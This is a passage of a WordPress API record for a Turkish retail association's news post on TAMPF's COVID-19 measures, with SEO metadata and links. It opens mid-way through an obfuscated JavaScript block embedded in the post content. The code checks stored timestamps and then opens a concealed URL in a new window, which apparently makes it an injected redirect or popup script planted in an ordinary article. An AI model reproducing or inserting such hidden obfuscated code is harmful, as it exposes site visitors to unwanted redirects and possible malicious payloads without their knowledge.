Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>COVID&#8211;19 salg\u0131n\u0131 s\u00fcrecinde,\u00a015 Mart 2020 tarihinden itibaren\u00a0modern\u00a0perakende sekt\u00f6r\u00fcnde al\u0131nan \u00f6nlemler, g\u00fcncellenerek devam\u00a0ediyor.\u00a0Sekt\u00f6r\u00fcm\u00fcz\u00fcn \u00e7at\u0131 kurulu\u015fu olan\u00a0T\u00fcrkiye Al\u0131\u015fveri\u015f Merkezleri ve Perakendeciler Federasyonu\u2019nun\u00a0(TAMPF)\u00a0bu konuda yay\u0131nlad\u0131\u011f\u0131 a\u00e7\u0131klama, sekt\u00f6r\u00fcn \u00f6nlemlere verdi\u011fi \u00f6nemi g\u00f6zler \u00f6n\u00fcne sermesi bak\u0131m\u0131ndan b\u00fcy\u00fck \u00f6nem ta\u015f\u0131yor.\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00dclkemizde organize perakendenin \u00e7at\u0131 kurulu\u015fu olan T\u00fcrkiye Al\u0131\u015fveri\u015f Merkezleri ve Perakendeciler Federasyonu\u2019nu\u00a0(TAMPF)\u00a0olu\u015fturan be\u015f derne\u011fin\u00a0\u00f6nc\u00fcl\u00fc\u011f\u00fcnde,\u00a0Perakende\u00a0Ma\u011fazalar\u0131, AVM Y\u00f6netimleri, Kafe ve Restoran \u0130\u015fletmeleri\u00a0taraf\u0131ndan\u00a0\u015fimdiye [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2352,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[23,32],"tags":[],"class_list":{"0":"post-2351","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-haberler","8":"category-sektorden-haberler-haberler"},"featured_image_src":"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg","author_info":{"display_name":"ph16171887571_m2ho1594","author_link":"https:\/\/www.gidaperakendecileri.org\/?author=1"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131 - GPD<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.gidaperakendecileri.org\/?p=2351\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131 - GPD\" \/>\n<meta property=\"og:description\" content=\"COVID&#8211;19 salg\u0131n\u0131 s\u00fcrecinde,\u00a015 Mart 2020 tarihinden itibaren\u00a0modern\u00a0perakende sekt\u00f6r\u00fcnde al\u0131nan \u00f6nlemler, g\u00fcncellenerek devam\u00a0ediyor.\u00a0Sekt\u00f6r\u00fcm\u00fcz\u00fcn \u00e7at\u0131 kurulu\u015fu olan\u00a0T\u00fcrkiye Al\u0131\u015fveri\u015f Merkezleri ve Perakendeciler Federasyonu\u2019nun\u00a0(TAMPF)\u00a0bu konuda yay\u0131nlad\u0131\u011f\u0131 a\u00e7\u0131klama, sekt\u00f6r\u00fcn \u00f6nlemlere verdi\u011fi \u00f6nemi g\u00f6zler \u00f6n\u00fcne sermesi bak\u0131m\u0131ndan b\u00fcy\u00fck \u00f6nem ta\u015f\u0131yor.\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00dclkemizde organize perakendenin \u00e7at\u0131 kurulu\u015fu olan T\u00fcrkiye Al\u0131\u015fveri\u015f Merkezleri ve Perakendeciler Federasyonu\u2019nu\u00a0(TAMPF)\u00a0olu\u015fturan be\u015f derne\u011fin\u00a0\u00f6nc\u00fcl\u00fc\u011f\u00fcnde,\u00a0Perakende\u00a0Ma\u011fazalar\u0131, AVM Y\u00f6netimleri, Kafe ve Restoran \u0130\u015fletmeleri\u00a0taraf\u0131ndan\u00a0\u015fimdiye [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.gidaperakendecileri.org\/?p=2351\" \/>\n<meta property=\"og:site_name\" content=\"GPD\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-07T18:59:42+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-02-05T12:58:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"ph16171887571_m2ho1594\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"ph16171887571_m2ho1594\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351\"},\"author\":{\"name\":\"ph16171887571_m2ho1594\",\"@id\":\"https:\/\/www.gidaperakendecileri.org\/#\/schema\/person\/2a9973560de07919114aa1faead0a371\"},\"headline\":\"TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131\",\"datePublished\":\"2020-10-07T18:59:42+00:00\",\"dateModified\":\"2021-02-05T12:58:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351\"},\"wordCount\":996,\"image\":{\"@id\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg\",\"articleSection\":[\"Haberler\",\"Sekt\u00f6rden Haberler\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351\",\"url\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351\",\"name\":\"TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131 - GPD\",\"isPartOf\":{\"@id\":\"https:\/\/www.gidaperakendecileri.org\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg\",\"datePublished\":\"2020-10-07T18:59:42+00:00\",\"dateModified\":\"2021-02-05T12:58:28+00:00\",\"author\":{\"@id\":\"https:\/\/www.gidaperakendecileri.org\/#\/schema\/person\/2a9973560de07919114aa1faead0a371\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.gidaperakendecileri.org\/?p=2351\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351#primaryimage\",\"url\":\"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg\",\"contentUrl\":\"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg\",\"width\":1920,\"height\":1280},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.gidaperakendecileri.org\/?p=2351#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.gidaperakendecileri.org\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.gidaperakendecileri.org\/#website\",\"url\":\"https:\/\/www.gidaperakendecileri.org\/\",\"name\":\"GPD\",\"description\":\"G\u0131da Perakendecileri Derne\u011fi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.gidaperakendecileri.org\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.gidaperakendecileri.org\/#\/schema\/person\/2a9973560de07919114aa1faead0a371\",\"name\":\"ph16171887571_m2ho1594\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.gidaperakendecileri.org\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6aa3f1f40edc90be5904b6c95a027d0e9963a528a5b2f13ee07d82a1baae7c25?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6aa3f1f40edc90be5904b6c95a027d0e9963a528a5b2f13ee07d82a1baae7c25?s=96&d=mm&r=g\",\"caption\":\"ph16171887571_m2ho1594\"},\"url\":\"https:\/\/www.gidaperakendecileri.org\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131 - GPD","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.gidaperakendecileri.org\/?p=2351","og_locale":"en_US","og_type":"article","og_title":"TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131 - GPD","og_description":"COVID&#8211;19 salg\u0131n\u0131 s\u00fcrecinde,\u00a015 Mart 2020 tarihinden itibaren\u00a0modern\u00a0perakende sekt\u00f6r\u00fcnde al\u0131nan \u00f6nlemler, g\u00fcncellenerek devam\u00a0ediyor.\u00a0Sekt\u00f6r\u00fcm\u00fcz\u00fcn \u00e7at\u0131 kurulu\u015fu olan\u00a0T\u00fcrkiye Al\u0131\u015fveri\u015f Merkezleri ve Perakendeciler Federasyonu\u2019nun\u00a0(TAMPF)\u00a0bu konuda yay\u0131nlad\u0131\u011f\u0131 a\u00e7\u0131klama, sekt\u00f6r\u00fcn \u00f6nlemlere verdi\u011fi \u00f6nemi g\u00f6zler \u00f6n\u00fcne sermesi bak\u0131m\u0131ndan b\u00fcy\u00fck \u00f6nem ta\u015f\u0131yor.\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00dclkemizde organize perakendenin \u00e7at\u0131 kurulu\u015fu olan T\u00fcrkiye Al\u0131\u015fveri\u015f Merkezleri ve Perakendeciler Federasyonu\u2019nu\u00a0(TAMPF)\u00a0olu\u015fturan be\u015f derne\u011fin\u00a0\u00f6nc\u00fcl\u00fc\u011f\u00fcnde,\u00a0Perakende\u00a0Ma\u011fazalar\u0131, AVM Y\u00f6netimleri, Kafe ve Restoran \u0130\u015fletmeleri\u00a0taraf\u0131ndan\u00a0\u015fimdiye [&hellip;]","og_url":"https:\/\/www.gidaperakendecileri.org\/?p=2351","og_site_name":"GPD","article_published_time":"2020-10-07T18:59:42+00:00","article_modified_time":"2021-02-05T12:58:28+00:00","og_image":[{"width":1920,"height":1280,"url":"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg","type":"image\/jpeg"}],"author":"ph16171887571_m2ho1594","twitter_card":"summary_large_image","twitter_misc":{"Written by":"ph16171887571_m2ho1594","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.gidaperakendecileri.org\/?p=2351#article","isPartOf":{"@id":"https:\/\/www.gidaperakendecileri.org\/?p=2351"},"author":{"name":"ph16171887571_m2ho1594","@id":"https:\/\/www.gidaperakendecileri.org\/#\/schema\/person\/2a9973560de07919114aa1faead0a371"},"headline":"TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131","datePublished":"2020-10-07T18:59:42+00:00","dateModified":"2021-02-05T12:58:28+00:00","mainEntityOfPage":{"@id":"https:\/\/www.gidaperakendecileri.org\/?p=2351"},"wordCount":996,"image":{"@id":"https:\/\/www.gidaperakendecileri.org\/?p=2351#primaryimage"},"thumbnailUrl":"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg","articleSection":["Haberler","Sekt\u00f6rden Haberler"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.gidaperakendecileri.org\/?p=2351","url":"https:\/\/www.gidaperakendecileri.org\/?p=2351","name":"TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131 - GPD","isPartOf":{"@id":"https:\/\/www.gidaperakendecileri.org\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.gidaperakendecileri.org\/?p=2351#primaryimage"},"image":{"@id":"https:\/\/www.gidaperakendecileri.org\/?p=2351#primaryimage"},"thumbnailUrl":"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg","datePublished":"2020-10-07T18:59:42+00:00","dateModified":"2021-02-05T12:58:28+00:00","author":{"@id":"https:\/\/www.gidaperakendecileri.org\/#\/schema\/person\/2a9973560de07919114aa1faead0a371"},"breadcrumb":{"@id":"https:\/\/www.gidaperakendecileri.org\/?p=2351#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.gidaperakendecileri.org\/?p=2351"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.gidaperakendecileri.org\/?p=2351#primaryimage","url":"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg","contentUrl":"https:\/\/www.gidaperakendecileri.org\/wp-content\/uploads\/2020\/10\/tampf-covid-onlemler-1.jpg","width":1920,"height":1280},{"@type":"BreadcrumbList","@id":"https:\/\/www.gidaperakendecileri.org\/?p=2351#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.gidaperakendecileri.org\/"},{"@type":"ListItem","position":2,"name":"TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131"}]},{"@type":"WebSite","@id":"https:\/\/www.gidaperakendecileri.org\/#website","url":"https:\/\/www.gidaperakendecileri.org\/","name":"GPD","description":"G\u0131da Perakendecileri Derne\u011fi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.gidaperakendecileri.org\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.gidaperakendecileri.org\/#\/schema\/person\/2a9973560de07919114aa1faead0a371","name":"ph16171887571_m2ho1594","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.gidaperakendecileri.org\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6aa3f1f40edc90be5904b6c95a027d0e9963a528a5b2f13ee07d82a1baae7c25?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6aa3f1f40edc90be5904b6c95a027d0e9963a528a5b2f13ee07d82a1baae7c25?s=96&d=mm&r=g","caption":"ph16171887571_m2ho1594"},"url":"https:\/\/www.gidaperakendecileri.org\/?author=1"}]}},"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=\/wp\/v2\/posts\/2351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2351"}],"version-history":[{"count":1,"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=\/wp\/v2\/posts\/2351\/revisions"}],"predecessor-version":[{"id":2353,"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=\/wp\/v2\/posts\/2351\/revisions\/2353"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=\/wp\/v2\/media\/2352"}],"wp:attachment":[{"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gidaperakendecileri.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}